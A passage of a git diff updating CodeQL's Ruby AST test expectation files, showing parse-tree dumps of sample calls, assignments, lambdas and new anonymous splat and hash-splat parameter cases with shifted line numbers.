[Integer] 0 -# 315| 3: [ReservedWord] ] -# 315| 1: [ReservedWord] = -# 315| 2: [Integer] 10 +# 306| 1: [Call] Call +# 306| 0: [Self] self +# 306| 1: [ReservedWord] . +# 306| 2: [Identifier] super +# 307| 2: [Call] Call +# 307| 0: [Super] super +# 307| 1: [ReservedWord] . +# 307| 2: [Identifier] super +# 308| 3: [ReservedWord] end +# 309| 3: [ReservedWord] end +# 312| 92: [Call] Call +# 312| 0: [Identifier] foo +# 312| 1: [ReservedWord] . +# 312| 2: [ArgumentList] ArgumentList +# 312| 0: [ReservedWord] ( +# 312| 1: [ReservedWord] ) +# 313| 93: [Call] Call +# 313| 0: [Identifier] foo +# 313| 1: [ReservedWord] . +# 313| 2: [ArgumentList] ArgumentList +# 313| 0: [ReservedWord] ( +# 313| 1: [Integer] 1 +# 313| 2: [ReservedWord] ) # 316| 94: [Assignment] Assignment -# 316| 0: [LeftAssignmentList] LeftAssignmentList -# 316| 0: [Call] Call -# 316| 0: [Self] self -# 316| 1: [ReservedWord] . -# 316| 2: [Identifier] foo -# 316| 1: [ReservedWord] , -# 316| 2: [RestAssignment] RestAssignment -# 316| 0: [ReservedWord] * -# 316| 1: [Call] Call -# 316| 0: [Self] self -# 316| 1: [ReservedWord] . -# 316| 2: [Identifier] bar -# 316| 3: [ReservedWord] , -# 316| 4: [ElementReference] ElementReference -# 316| 0: [Identifier] foo -# 316| 1: [ReservedWord] [ -# 316| 2: [Integer] 4 -# 316| 3: [ReservedWord] ] +# 316| 0: [Call] Call +# 316| 0: [Self] self +# 316| 1: [ReservedWord] . +# 316| 2: [Identifier] foo # 316| 1: [ReservedWord] = -# 316| 2: [Array] Array -# 316| 0: [ReservedWord] [ -# 316| 1: [Integer] 1 -# 316| 2: [ReservedWord] , -# 316| 3: [Integer] 2 -# 316| 4: [ReservedWord] , -# 316| 5: [Integer] 3 -# 316| 6: [ReservedWord] , -# 316| 7: [Integer] 4 -# 316| 8: [ReservedWord] ] +# 316| 2: [Integer] 10 # 317| 95: [Assignment] Assignment -# 317| 0: [LeftAssignmentList] LeftAssignmentList -# 317| 0: [Identifier] a -# 317| 1: [ReservedWord] , -# 317| 2: [RestAssignment] RestAssignment -# 317| 0: [ReservedWord] * -# 317| 1: [ElementReference] ElementReference -# 317| 0: [Identifier] foo -# 317| 1: [ReservedWord] [ -# 317| 2: [Integer] 5 -# 317| 3: [ReservedWord] ] +# 317| 0: [ElementReference] ElementReference +# 317| 0: [Identifier] foo +# 317| 1: [ReservedWord] [ +# 317| 2: [Integer] 0 +# 317| 3: [ReservedWord] ] # 317| 1: [ReservedWord] = -# 317| 2: [Array] Array -# 317| 0: [ReservedWord] [ -# 317| 1: [Integer] 1 -# 317| 2: [ReservedWord] , -# 317| 3: [Integer] 2 -# 317| 4: [ReservedWord] , -# 317| 5: [Integer] 3 -# 317| 6: [ReservedWord] ] -# 318| 96: [OperatorAssignment] OperatorAssignment -# 318| 0: [Call] Call -# 318| 0: [Self] self -# 318| 1: [ReservedWord] . -# 318| 2: [Identifier] count -# 318| 1: [ReservedWord] += -# 318| 2: [Integer] 1 -# 319| 97: [OperatorAssignment] OperatorAssignment -# 319| 0: [ElementReference] ElementReference -# 319| 0: [Identifier] foo -# 319| 1: [ReservedWord] [ -# 319| 2: [Integer] 0 -# 319| 3: [ReservedWord] ] -# 319| 1: [ReservedWord] += -# 319| 2: [Integer] 1 +# 317| 2: [Integer] 10 +# 318| 96: [Assignment] Assignment +# 318| 0: [LeftAssignmentList] LeftAssignmentList +# 318| 0: [Call] Call +# 318| 0: [Self] self +# 318| 1: [ReservedWord] . +# 318| 2: [Identifier] foo +# 318| 1: [ReservedWord] , +# 318| 2: [RestAssignment] RestAssignment +# 318| 0: [ReservedWord] * +# 318| 1: [Call] Call +# 318| 0: [Self] self +# 318| 1: [ReservedWord] . +# 318| 2: [Identifier] bar +# 318| 3: [ReservedWord] , +# 318| 4: [ElementReference] ElementReference +# 318| 0: [Identifier] foo +# 318| 1: [ReservedWord] [ +# 318| 2: [Integer] 4 +# 318| 3: [ReservedWord] ] +# 318| 1: [ReservedWord] = +# 318| 2: [Array] Array +# 318| 0: [ReservedWord] [ +# 318| 1: [Integer] 1 +# 318| 2: [ReservedWord] , +# 318| 3: [Integer] 2 +# 318| 4: [ReservedWord] , +# 318| 5: [Integer] 3 +# 318| 6: [ReservedWord] , +# 318| 7: [Integer] 4 +# 318| 8: [ReservedWord] ] +# 319| 97: [Assignment] Assignment +# 319| 0: [LeftAssignmentList] LeftAssignmentList +# 319| 0: [Identifier] a +# 319| 1: [ReservedWord] , +# 319| 2: [RestAssignment] RestAssignment +# 319| 0: [ReservedWord] * +# 319| 1: [ElementReference] ElementReference +# 319| 0: [Identifier] foo +# 319| 1: [ReservedWord] [ +# 319| 2: [Integer] 5 +# 319| 3: [ReservedWord] ] +# 319| 1: [ReservedWord] = +# 319| 2: [Array] Array +# 319| 0: [ReservedWord] [ +# 319| 1: [Integer] 1 +# 319| 2: [ReservedWord] , +# 319| 3: [Integer] 2 +# 319| 4: [ReservedWord] , +# 319| 5: [Integer] 3 +# 319| 6: [ReservedWord] ] # 320| 98: [OperatorAssignment] OperatorAssignment -# 320| 0: [ElementReference] ElementReference -# 320| 0: [Call] Call -# 320| 0: [Identifier] foo -# 320| 1: [ReservedWord] . -# 320| 2: [Identifier] bar -# 320| 1: [ReservedWord] [ -# 320| 2: [Integer] 0 -# 320| 3: [ReservedWord] , -# 320| 4: [Call] Call -# 320| 0: [Identifier] foo -# 320| 1: [ReservedWord] . -# 320| 2: [Identifier] baz -# 320| 5: [ReservedWord] , -# 320| 6: [Binary] Binary -# 320| 0: [Call] Call -# 320| 0: [Identifier] foo -# 320| 1: [ReservedWord] . -# 320| 2: [Identifier] boo -# 320| 1: [ReservedWord] + -# 320| 2: [Integer] 1 -# 320| 7: [ReservedWord] ] -# 320| 1: [ReservedWord] *= -# 320| 2: [Integer] 2 -# 323| 99: [Method] Method -# 323| 0: [ReservedWord] def -# 323| 1: [Identifier] foo -# 323| 2: [ReservedWord] = -# 323| 3: [Identifier] bar -# 324| 100: [Method] Method -# 324| 0: [ReservedWord] def -# 324| 1: [Identifier] foo -# 324| 2: [MethodParameters] MethodParameters -# 324| 0: [ReservedWord] ( -# 324| 1: [ReservedWord] ) -# 324| 3: [ReservedWord] = -# 324| 4: [Identifier] bar +# 320| 0: [Call] Call +# 320| 0: [Self] self +# 320| 1: [ReservedWord] . +# 320| 2: [Identifier] count +# 320| 1: [ReservedWord] += +# 320| 2: [Integer] 1 +# 321| 99: [OperatorAssignment] OperatorAssignment +# 321| 0: [ElementReference] ElementReference +# 321| 0: [Identifier] foo +# 321| 1: [ReservedWord] [ +# 321| 2: [Integer] 0 +# 321| 3: [ReservedWord] ] +# 321| 1: [ReservedWord] += +# 321| 2: [Integer] 1 +# 322| 100: [OperatorAssignment] OperatorAssignment +# 322| 0: [ElementReference] ElementReference +# 322| 0: [Call] Call +# 322| 0: [Identifier] foo +# 322| 1: [ReservedWord] . +# 322| 2: [Identifier] bar +# 322| 1: [ReservedWord] [ +# 322| 2: [Integer] 0 +# 322| 3: [ReservedWord] , +# 322| 4: [Call] Call +# 322| 0: [Identifier] foo +# 322| 1: [ReservedWord] . +# 322| 2: [Identifier] baz +# 322| 5: [ReservedWord] , +# 322| 6: [Binary] Binary +# 322| 0: [Call] Call +# 322| 0: [Identifier] foo +# 322| 1: [ReservedWord] . +# 322| 2: [Identifier] boo +# 322| 1: [ReservedWord] + +# 322| 2: [Integer] 1 +# 322| 7: [ReservedWord] ] +# 322| 1: [ReservedWord] *= +# 322| 2: [Integer] 2 # 325| 101: [Method] Method # 325| 0: [ReservedWord] def # 325| 1: [Identifier] foo -# 325| 2: [MethodParameters] MethodParameters -# 325| 0: [ReservedWord] ( -# 325| 1: [Identifier] x -# 325| 2: [ReservedWord] ) -# 325| 3: [ReservedWord] = -# 325| 4: [Identifier] bar -# 326| 102: [SingletonMethod] SingletonMethod +# 325| 2: [ReservedWord] = +# 325| 3: [Identifier] bar +# 326| 102: [Method] Method # 326| 0: [ReservedWord] def -# 326| 1: [Constant] Object -# 326| 2: [ReservedWord] . -# 326| 3: [Identifier] foo -# 326| 4: [ReservedWord] = -# 326| 5: [Identifier] bar -# 327| 103: [SingletonMethod] SingletonMethod +# 326| 1: [Identifier] foo +# 326| 2: [MethodParameters] MethodParameters +# 326| 0: [ReservedWord] ( +# 326| 1: [ReservedWord] ) +# 326| 3: [ReservedWord] = +# 326| 4: [Identifier] bar +# 327| 103: [Method] Method # 327| 0: [ReservedWord] def -# 327| 1: [Constant] Object -# 327| 2: [ReservedWord] . -# 327| 3: [Identifier] foo -# 327| 4: [MethodParameters] MethodParameters +# 327| 1: [Identifier] foo +# 327| 2: [MethodParameters] MethodParameters # 327| 0: [ReservedWord] ( # 327| 1: [Identifier] x # 327| 2: [ReservedWord] ) -# 327| 5: [ReservedWord] = -# 327| 6: [Identifier] bar -# 328| 104: [Method] Method +# 327| 3: [ReservedWord] = +# 327| 4: [Identifier] bar +# 328| 104: [SingletonMethod] SingletonMethod # 328| 0: [ReservedWord] def -# 328| 1: [Identifier] foo -# 328| 2: [MethodParameters] MethodParameters -# 328| 0: [ReservedWord] ( -# 328| 1: [ReservedWord] ) -# 328| 3: [ReservedWord] = -# 328| 4: [RescueModifier] RescueModifier -# 328| 0: [Identifier] bar -# 328| 1: [ReservedWord] rescue -# 328| 2: [ParenthesizedStatements] ParenthesizedStatements -# 328| 0: [ReservedWord] ( -# 328| 1: [Call] Call -# 328| 0: [Identifier] print -# 328| 1: [ArgumentList] ArgumentList -# 328| 0: [String] String -# 328| 0: [ReservedWord] " -# 328| 1: [StringContent] error -# 328| 2: [ReservedWord] " -# 328| 2: [ReservedWord] ) -# 331| 105: [Method] Method -# 331| 0: [ReservedWord] def -# 331| 1: [Identifier] foo -# 331| 2: [MethodParameters] MethodParameters -# 331| 0: [ReservedWord] ( -# 331| 1: [ForwardParameter] ... -# 331| 0: [ReservedWord] ... -# 331| 2: [ReservedWord] ) -# 332| 3: [BodyStatement] BodyStatement -# 332| 0: [Call] Call -# 332| 0: [Super] super -# 332| 1: [ArgumentList] ArgumentList -# 332| 0: [ReservedWord] ( -# 332| 1: [ForwardArgument] ... -# 332| 0: [ReservedWord] ... -# 332| 2: [ReservedWord] ) -# 333| 4: [ReservedWord] end -# 335| 106: [Method] Method -# 335| 0: [ReservedWord] def -# 335| 1: [Identifier] foo -# 335| 2: [MethodParameters] MethodParameters -# 335| 0: [ReservedWord] ( -# 335| 1: [Identifier] a -# 335| 2: [ReservedWord] , -# 335| 3: [Identifier] b -# 335| 4: [ReservedWord] , -# 335| 5: [ForwardParameter] ... -# 335| 0: [ReservedWord] ... -# 335| 6: [ReservedWord] ) -# 336| 3: [BodyStatement] BodyStatement -# 336| 0: [Call] Call -# 336| 0: [Identifier] bar -# 336| 1: [ArgumentList] ArgumentList -# 336| 0: [ReservedWord] ( -# 336| 1: [Identifier] b -# 336| 2: [ReservedWord] , -# 336| 3: [ForwardArgument] ... -# 336| 0: [ReservedWord] ... -# 336| 4: [ReservedWord] ) -# 337| 4: [ReservedWord] end -# 340| 107: [For] For -# 340| 0: [ReservedWord] for -# 340| 1: [LeftAssignmentList] LeftAssignmentList -# 340| 0: [Identifier] x -# 340| 1: [ReservedWord] , -# 340| 2: [Identifier] y -# 340| 3: [ReservedWord] , -# 340| 4: [Identifier] z -# 340| 2: [In] In -# 340| 0: [ReservedWord] in -# 340| 1: [Array] Array -# 340| 0: [ReservedWord] [ -# 340| 1: [Array] Array -# 340| 0: [ReservedWord] [ -# 340| 1: [Integer] 1 -# 340| 2: [ReservedWord] , -# 340| 3: [Integer] 2 -# 340| 4: [ReservedWord] , -# 340| 5: [Integer] 3 -# 340| 6: [ReservedWord] ] -# 340| 2: [ReservedWord] , -# 340| 3: [Array] Array -# 340| 0: [ReservedWord] [ -# 340| 1: [Integer] 4 -# 340| 2: [ReservedWord] , -# 340| 3: [Integer] 5 -# 340| 4: [ReservedWord] , -# 340| 5: [Integer] 6 -# 340| 6: [ReservedWord] ] -# 340| 4: [ReservedWord] ] -# 340| 3: [Do] Do -# 341| 0: [Call] Call -# 341| 0: [Identifier] foo -# 341| 1: [ArgumentList] ArgumentList -# 341| 0: [Identifier] x -# 341| 1: [ReservedWord] , -# 341| 2: [Identifier] y -# 341| 3: [ReservedWord] , -# 341| 4: [Identifier] z -# 342| 1: [ReservedWord] end -# 344| 108: [Call] Call -# 344| 0: [Identifier] foo -# 344| 1: [ArgumentList] ArgumentList -# 344| 0: [ReservedWord] ( -# 344| 1: [Pair] Pair -# 344| 0: [HashKeySymbol] x -# 344| 1: [ReservedWord] : -# 344| 2: [Integer] 42 -# 344| 2: [ReservedWord] ) -# 345| 109: [Call] Call -# 345| 0: [Identifier] foo -# 345| 1: [ArgumentList] ArgumentList -# 345| 0: [ReservedWord] ( -# 345| 1: [Pair] Pair -# 345| 0: [HashKeySymbol] x -# 345| 1: [ReservedWord] : -# 345| 2: [ReservedWord] , -# 345| 3: [Pair] Pair -# 345| 0: [HashKeySymbol] novar -# 345| 1: [ReservedWord] : -# 345| 4: [ReservedWord] ) +# 328| 1: [Constant] Object +# 328| 2: [ReservedWord] . +# 328| 3: [Identifier] foo +# 328| 4: [ReservedWord] = +# 328| 5: [Identifier] bar +# 329| 105: [SingletonMethod] SingletonMethod +# 329| 0: [ReservedWord] def +# 329| 1: [Constant] Object +# 329| 2: [ReservedWord] . +# 329| 3: [Identifier] foo +# 329| 4: [MethodParameters] MethodParameters +# 329| 0: [ReservedWord] ( +# 329| 1: [Identifier] x +# 329| 2: [ReservedWord] ) +# 329| 5: [ReservedWord] = +# 329| 6: [Identifier] bar +# 330| 106: [Method] Method +# 330| 0: [ReservedWord] def +# 330| 1: [Identifier] foo +# 330| 2: [MethodParameters] MethodParameters +# 330| 0: [ReservedWord] ( +# 330| 1: [ReservedWord] ) +# 330| 3: [ReservedWord] = +# 330| 4: [RescueModifier] RescueModifier +# 330| 0: [Identifier] bar +# 330| 1: [ReservedWord] rescue +# 330| 2: [ParenthesizedStatements] ParenthesizedStatements +# 330| 0: [ReservedWord] ( +# 330| 1: [Call] Call +# 330| 0: [Identifier] print +# 330| 1: [ArgumentList] ArgumentList +# 330| 0: [String] String +# 330| 0: [ReservedWord] " +# 330| 1: [StringContent] error +# 330| 2: [ReservedWord] " +# 330| 2: [ReservedWord] ) +# 333| 107: [Method] Method +# 333| 0: [ReservedWord] def +# 333| 1: [Identifier] foo +# 333| 2: [MethodParameters] MethodParameters +# 333| 0: [ReservedWord] ( +# 333| 1: [ForwardParameter] ... +# 333| 0: [ReservedWord] ... +# 333| 2: [ReservedWord] ) +# 334| 3: [BodyStatement] BodyStatement +# 334| 0: [Call] Call +# 334| 0: [Super] super +# 334| 1: [ArgumentList] ArgumentList +# 334| 0: [ReservedWord] ( +# 334| 1: [ForwardArgument] ... +# 334| 0: [ReservedWord] ... +# 334| 2: [ReservedWord] ) +# 335| 4: [ReservedWord] end +# 337| 108: [Method] Method +# 337| 0: [ReservedWord] def +# 337| 1: [Identifier] foo +# 337| 2: [MethodParameters] MethodParameters +# 337| 0: [ReservedWord] ( +# 337| 1: [Identifier] a +# 337| 2: [ReservedWord] , +# 337| 3: [Identifier] b +# 337| 4: [ReservedWord] , +# 337| 5: [ForwardParameter] ... +# 337| 0: [ReservedWord] ... +# 337| 6: [ReservedWord] ) +# 338| 3: [BodyStatement] BodyStatement +# 338| 0: [Call] Call +# 338| 0: [Identifier] bar +# 338| 1: [ArgumentList] ArgumentList +# 338| 0: [ReservedWord] ( +# 338| 1: [Identifier] b +# 338| 2: [ReservedWord] , +# 338| 3: [ForwardArgument] ... +# 338| 0: [ReservedWord] ... +# 338| 4: [ReservedWord] ) +# 339| 4: [ReservedWord] end +# 342| 109: [For] For +# 342| 0: [ReservedWord] for +# 342| 1: [LeftAssignmentList] LeftAssignmentList +# 342| 0: [Identifier] x +# 342| 1: [ReservedWord] , +# 342| 2: [Identifier] y +# 342| 3: [ReservedWord] , +# 342| 4: [Identifier] z +# 342| 2: [In] In +# 342| 0: [ReservedWord] in +# 342| 1: [Array] Array +# 342| 0: [ReservedWord] [ +# 342| 1: [Array] Array +# 342| 0: [ReservedWord] [ +# 342| 1: [Integer] 1 +# 342| 2: [ReservedWord] , +# 342| 3: [Integer] 2 +# 342| 4: [ReservedWord] , +# 342| 5: [Integer] 3 +# 342| 6: [ReservedWord] ] +# 342| 2: [ReservedWord] , +# 342| 3: [Array] Array +# 342| 0: [ReservedWord] [ +# 342| 1: [Integer] 4 +# 342| 2: [ReservedWord] , +# 342| 3: [Integer] 5 +# 342| 4: [ReservedWord] , +# 342| 5: [Integer] 6 +# 342| 6: [ReservedWord] ] +# 342| 4: [ReservedWord] ] +# 342| 3: [Do] Do +# 343| 0: [Call] Call +# 343| 0: [Identifier] foo +# 343| 1: [ArgumentList] ArgumentList +# 343| 0: [Identifier] x +# 343| 1: [ReservedWord] , +# 343| 2: [Identifier] y +# 343| 3: [ReservedWord] , +# 343| 4: [Identifier] z +# 344| 1: [ReservedWord] end # 346| 110: [Call] Call # 346| 0: [Identifier] foo # 346| 1: [ArgumentList] ArgumentList # 346| 0: [ReservedWord] ( # 346| 1: [Pair] Pair -# 346| 0: [HashKeySymbol] X +# 346| 0: [HashKeySymbol] x # 346| 1: [ReservedWord] : # 346| 2: [Integer] 42 # 346| 2: [ReservedWord] ) @@ -1228,46 +1221,36 @@ calls/calls.rb: # 347| 1: [ArgumentList] ArgumentList # 347| 0: [ReservedWord] ( # 347| 1: [Pair] Pair -# 347| 0: [HashKeySymbol] X +# 347| 0: [HashKeySymbol] x # 347| 1: [ReservedWord] : -# 347| 2: [ReservedWord] ) -# 350| 112: [Assignment] Assignment -# 350| 0: [Identifier] y -# 350| 1: [ReservedWord] = -# 350| 2: [Integer] 1 -# 351| 113: [Assignment] Assignment -# 351| 0: [Identifier] one -# 351| 1: [ReservedWord] = -# 351| 2: [Lambda] Lambda -# 351| 0: [ReservedWord] -> -# 351| 1: [LambdaParameters] LambdaParameters -# 351| 0: [ReservedWord] ( -# 351| 1: [Identifier] x -# 351| 2: [ReservedWord] ) -# 351| 2: [Block] Block -# 351| 0: [ReservedWord] { -# 351| 1: [BlockBody] BlockBody -# 351| 0: [Identifier] y -# 351| 2: [ReservedWord] } +# 347| 2: [ReservedWord] , +# 347| 3: [Pair] Pair +# 347| 0: [HashKeySymbol] novar +# 347| 1: [ReservedWord] : +# 347| 4: [ReservedWord] ) +# 348| 112: [Call] Call +# 348| 0: [Identifier] foo +# 348| 1: [ArgumentList] ArgumentList +# 348| 0: [ReservedWord] ( +# 348| 1: [Pair] Pair +# 348| 0: [HashKeySymbol] X +# 348| 1: [ReservedWord] : +# 348| 2: [Integer] 42 +# 348| 2: [ReservedWord] ) +# 349| 113: [Call] Call +# 349| 0: [Identifier] foo +# 349| 1: [ArgumentList] ArgumentList +# 349| 0: [ReservedWord] ( +# 349| 1: [Pair] Pair +# 349| 0: [HashKeySymbol] X +# 349| 1: [ReservedWord] : +# 349| 2: [ReservedWord] ) # 352| 114: [Assignment] Assignment -# 352| 0: [Identifier] f +# 352| 0: [Identifier] y # 352| 1: [ReservedWord] = -# 352| 2: [Lambda] Lambda -# 352| 0: [ReservedWord] -> -# 352| 1: [LambdaParameters] LambdaParameters -# 352| 0: [ReservedWord] ( -# 352| 1: [Identifier] x -# 352| 2: [ReservedWord] ) -# 352| 2: [Block] Block -# 352| 0: [ReservedWord] { -# 352| 1: [BlockBody] BlockBody -# 352| 0: [Call] Call -# 352| 0: [Identifier] foo -# 352| 1: [ArgumentList] ArgumentList -# 352| 0: [Identifier] x -# 352| 2: [ReservedWord] } +# 352| 2: [Integer] 1 # 353| 115: [Assignment] Assignment -# 353| 0: [Identifier] g +# 353| 0: [Identifier] one # 353| 1: [ReservedWord] = # 353| 2: [Lambda] Lambda # 353| 0: [ReservedWord] -> @@ -1278,10 +1261,10 @@ calls/calls.rb: # 353| 2: [Block] Block # 353| 0: [ReservedWord] { # 353| 1: [BlockBody] BlockBody -# 353| 0: [Identifier] unknown_call +# 353| 0: [Identifier] y # 353| 2: [ReservedWord] } # 354| 116: [Assignment] Assignment -# 354| 0: [Identifier] h +# 354| 0: [Identifier] f # 354| 1: [ReservedWord] = # 354| 2: [Lambda] Lambda # 354| 0: [ReservedWord] -> @@ -1289,44 +1272,75 @@ calls/calls.rb: # 354| 0: [ReservedWord] ( # 354| 1: [Identifier] x # 354| 2: [ReservedWord] ) -# 354| 2: [DoBlock] DoBlock -# 354| 0: [ReservedWord] do -# 355| 1: [BodyStatement] BodyStatement -# 355| 0: [Identifier] x -# 356| 1: [Identifier] y -# 357| 2: [Identifier] unknown_call -# 358| 2: [ReservedWord] end -# 361| 117: [Call] Call -# 361| 0: [Identifier] list -# 361| 1: [ReservedWord] . -# 361| 2: [Identifier] empty? -# 362| 118: [Call] Call -# 362| 0: [Identifier] list -# 362| 1: [ReservedWord] &. -# 362| 2: [Identifier] empty? +# 354| 2: [Block] Block +# 354| 0: [ReservedWord] { +# 354| 1: [BlockBody] BlockBody +# 354| 0: [Call] Call +# 354| 0: [Identifier] foo +# 354| 1: [ArgumentList] ArgumentList +# 354| 0: [Identifier] x +# 354| 2: [ReservedWord] } +# 355| 117: [Assignment] Assignment +# 355| 0: [Identifier] g +# 355| 1: [ReservedWord] = +# 355| 2: [Lambda] Lambda +# 355| 0: [ReservedWord] -> +# 355| 1: [LambdaParameters] LambdaParameters +# 355| 0: [ReservedWord] ( +# 355| 1: [Identifier] x +# 355| 2: [ReservedWord] ) +# 355| 2: [Block] Block +# 355| 0: [ReservedWord] { +# 355| 1: [BlockBody] BlockBody +# 355| 0: [Identifier] unknown_call +# 355| 2: [ReservedWord] } +# 356| 118: [Assignment] Assignment +# 356| 0: [Identifier] h +# 356| 1: [ReservedWord] = +# 356| 2: [Lambda] Lambda +# 356| 0: [ReservedWord] -> +# 356| 1: [LambdaParameters] LambdaParameters +# 356| 0: [ReservedWord] ( +# 356| 1: [Identifier] x +# 356| 2: [ReservedWord] ) +# 356| 2: [DoBlock] DoBlock +# 356| 0: [ReservedWord] do +# 357| 1: [BodyStatement] BodyStatement +# 357| 0: [Identifier] x +# 358| 1: [Identifier] y +# 359| 2: [Identifier] unknown_call +# 360| 2: [ReservedWord] end # 363| 119: [Call] Call # 363| 0: [Identifier] list -# 363| 1: [ReservedWord] :: +# 363| 1: [ReservedWord] . # 363| 2: [Identifier] empty? # 364| 120: [Call] Call -# 364| 0: [Identifier] foo +# 364| 0: [Identifier] list # 364| 1: [ReservedWord] &. -# 364| 2: [Identifier] bar -# 364| 3: [ArgumentList] ArgumentList -# 364| 0: [ReservedWord] ( -# 364| 1: [Integer] 1 -# 364| 2: [ReservedWord] , -# 364| 3: [Integer] 2 -# 364| 4: [ReservedWord] ) -# 364| 4: [Block] Block -# 364| 0: [ReservedWord] { -# 364| 1: [BlockParameters] BlockParameters -# 364| 0: [ReservedWord] | -# 364| 1: [Identifier] x -# 364| 2: [ReservedWord] | -# 364| 2: [BlockBody] BlockBody -# 364| 0: [Identifier] x -# 364| 3: [ReservedWord] } +# 364| 2: [Identifier] empty? +# 365| 121: [Call] Call +# 365| 0: [Identifier] list +# 365| 1: [ReservedWord] :: +# 365| 2: [Identifier] empty? +# 366| 122: [Call] Call +# 366| 0: [Identifier] foo +# 366| 1: [ReservedWord] &. +# 366| 2: [Identifier] bar +# 366| 3: [ArgumentList] ArgumentList +# 366| 0: [ReservedWord] ( +# 366| 1: [Integer] 1 +# 366| 2: [ReservedWord] , +# 366| 3: [Integer] 2 +# 366| 4: [ReservedWord] ) +# 366| 4: [Block] Block +# 366| 0: [ReservedWord] { +# 366| 1: [BlockParameters] BlockParameters +# 366| 0: [ReservedWord] | +# 366| 1: [Identifier] x +# 366| 2: [ReservedWord] | +# 366| 2: [BlockBody] BlockBody +# 366| 0: [Identifier] x +# 366| 3: [ReservedWord] } # 1| [Comment] # call with no receiver, arguments, or block # 4| [Comment] # call whose name is a scope resolution # 7| [Comment] # call whose name is a global scope resolution @@ -1386,21 +1400,21 @@ calls/calls.rb: # 261| [Comment] # rescue-modifier body and handler # 265| [Comment] # block argument # 269| [Comment] # splat argument -# 273| [Comment] # hash-splat argument -# 277| [Comment] # the value in a keyword argument -# 281| [Comment] # ------------------------------------------------------------------------------ -# 282| [Comment] # calls to `super` -# 297| [Comment] # ------------------------------------------------------------------------------ -# 298| [Comment] # calls to methods simply named `super`, i.e. *not* calls to the same method in -# 299| [Comment] # a parent classs, so these should be Call but not SuperCall -# 305| [Comment] # we expect the receiver to be a SuperCall, while the outer call should not (it's just a regular Call) -# 309| [Comment] # calls without method name -# 313| [Comment] # setter calls -# 322| [Comment] # endless method definitions -# 330| [Comment] # forward parameter and forwarded arguments -# 339| [Comment] # for loop over nested array -# 349| [Comment] # calls inside lambdas -# 360| [Comment] # calls with various call operators +# 274| [Comment] # hash-splat argument +# 279| [Comment] # the value in a keyword argument +# 283| [Comment] # ------------------------------------------------------------------------------ +# 284| [Comment] # calls to `super` +# 299| [Comment] # ------------------------------------------------------------------------------ +# 300| [Comment] # calls to methods simply named `super`, i.e. *not* calls to the same method in +# 301| [Comment] # a parent classs, so these should be Call but not SuperCall +# 307| [Comment] # we expect the receiver to be a SuperCall, while the outer call should not (it's just a regular Call) +# 311| [Comment] # calls without method name +# 315| [Comment] # setter calls +# 324| [Comment] # endless method definitions +# 332| [Comment] # forward parameter and forwarded arguments +# 341| [Comment] # for loop over nested array +# 351| [Comment] # calls inside lambdas +# 362| [Comment] # calls with various call operators constants/constants.rb: # 1| [Program] Program # 1| 0: [Module] Module @@ -6069,6 +6083,48 @@ params/params.rb: # 86| 1: [ArgumentList] ArgumentList # 86| 0: [Identifier] x # 86| 3: [ReservedWord] } +# 89| 23: [Method] Method +# 89| 0: [ReservedWord] def +# 89| 1: [Identifier] anonymous_splat_parameter +# 89| 2: [MethodParameters] MethodParameters +# 89| 0: [ReservedWord] ( +# 89| 1: [Identifier] array +# 89| 2: [ReservedWord] , +# 89| 3: [SplatParameter] SplatParameter +# 89| 0: [ReservedWord] * +# 89| 4: [ReservedWord] ) +# 90| 3: [BodyStatement] BodyStatement +# 90| 0: [Call] Call +# 90| 0: [Identifier] array +# 90| 1: [ReservedWord] . +# 90| 2: [Identifier] concat +# 90| 3: [ArgumentList] ArgumentList +# 90| 0: [ReservedWord] ( +# 90| 1: [SplatArgument] SplatArgument +# 90| 0: [ReservedWord] * +# 90| 2: [ReservedWord] ) +# 91| 4: [ReservedWord] end +# 94| 24: [Method] Method +# 94| 0: [ReservedWord] def +# 94| 1: [Identifier] anonymous_hash_splat_parameter +# 94| 2: [MethodParameters] MethodParameters +# 94| 0: [ReservedWord] ( +# 94| 1: [Identifier] hash +# 94| 2: [ReservedWord] , +# 94| 3: [HashSplatParameter] HashSplatParameter +# 94| 0: [ReservedWord] ** +# 94| 4: [ReservedWord] ) +# 95| 3: [BodyStatement] BodyStatement +# 95| 0: [Call] Call +# 95| 0: [Identifier] hash +# 95| 1: [ReservedWord] . +# 95| 2: [Identifier] merge +# 95| 3: [ArgumentList] ArgumentList +# 95| 0: [ReservedWord] ( +# 95| 1: [HashSplatArgument] HashSplatArgument +# 95| 0: [ReservedWord] ** +# 95| 2: [ReservedWord] ) +# 96| 4: [ReservedWord] end # 1| [Comment] # Tests for the different kinds and contexts of parameters. # 3| [Comment] # Method containing identifier parameters # 7| [Comment] # Block containing identifier parameters @@ -6087,3 +6143,5 @@ params/params.rb: # 72| [Comment] # Method containing nil hash-splat params # 76| [Comment] # Block with nil hash-splat parameter # 80| [Comment] # Anonymous block parameter +# 88| [Comment] # Anonymous splat parameter +# 93| [Comment] # Anonymous hash splat parameter diff --git a/ruby/ql/test/library-tests/ast/ValueText.expected b/ruby/ql/test/library-tests/ast/ValueText.expected index cec6e7ad3a3..2cdd1df7507 100644 --- a/ruby/ql/test/library-tests/ast/ValueText.expected +++ b/ruby/ql/test/library-tests/ast/ValueText.expected @@ -10,76 +10,76 @@ exprValue | calls/calls.rb:26:7:26:7 | 1 | 1 | int | | calls/calls.rb:36:9:36:11 | 100 | 100 | int | | calls/calls.rb:36:14:36:16 | 200 | 200 | int | -| calls/calls.rb:278:5:278:8 | :blah | :blah | symbol | -| calls/calls.rb:279:5:279:8 | :blah | :blah | symbol | -| calls/calls.rb:288:11:288:16 | "blah" | blah | string | -| calls/calls.rb:289:11:289:11 | 1 | 1 | int | -| calls/calls.rb:289:14:289:14 | 2 | 2 | int | -| calls/calls.rb:289:17:289:17 | 3 | 3 | int | -| calls/calls.rb:290:21:290:21 | 1 | 1 | int | -| calls/calls.rb:291:22:291:22 | 2 | 2 | int | -| calls/calls.rb:292:11:292:11 | 4 | 4 | int | -| calls/calls.rb:292:14:292:14 | 5 | 5 | int | -| calls/calls.rb:292:26:292:28 | 100 | 100 | int | -| calls/calls.rb:293:11:293:11 | 6 | 6 | int | -| calls/calls.rb:293:14:293:14 | 7 | 7 | int | -| calls/calls.rb:293:27:293:29 | 200 | 200 | int | -| calls/calls.rb:311:6:311:6 | 1 | 1 | int | -| calls/calls.rb:314:1:314:8 | __synth__0 | 10 | int | -| calls/calls.rb:314:12:314:13 | 10 | 10 | int | -| calls/calls.rb:315:1:315:6 | __synth__0 | 10 | int | -| calls/calls.rb:315:5:315:5 | 0 | 0 | int | -| calls/calls.rb:315:10:315:11 | 10 | 10 | int | -| calls/calls.rb:316:1:316:8 | 0 | 0 | int | -| calls/calls.rb:316:12:316:19 | 1 | 1 | int | -| 